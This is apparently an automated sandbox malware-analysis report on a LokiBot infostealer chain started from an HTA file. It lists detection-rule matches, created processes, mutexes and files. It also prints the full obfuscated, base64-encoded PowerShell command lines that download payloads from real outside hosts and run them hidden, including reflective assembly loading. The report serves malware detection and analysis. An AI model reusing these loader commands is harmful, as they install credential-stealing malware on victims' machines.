Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: powershell.exe PID: 5948, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5536, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5536, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: aspnet_compiler.exe PID: 3092, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0080A8C0	9_2_0080A8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_0040549C	11_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_004029D4	11_2_004029D4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2018
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2406
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2018	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2406	Jump to behavior

Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: powershell.exe PID: 5948, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5536, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5536, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: aspnet_compiler.exe PID: 3092, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winHTA@20/23@1/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 11_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

11_2_0040650A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 11_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

11_2_0040434D

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seemybestthingswithentirelifetimethingstodomybest[1].tiff

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3056:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2796:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tz3rac5n.yvd.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS"

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: kissmegoodthingwhichgivemebestthignswithgirluaremy.hta

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\kissmegoodthingwhichgivemebestthignswithgirluaremy.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
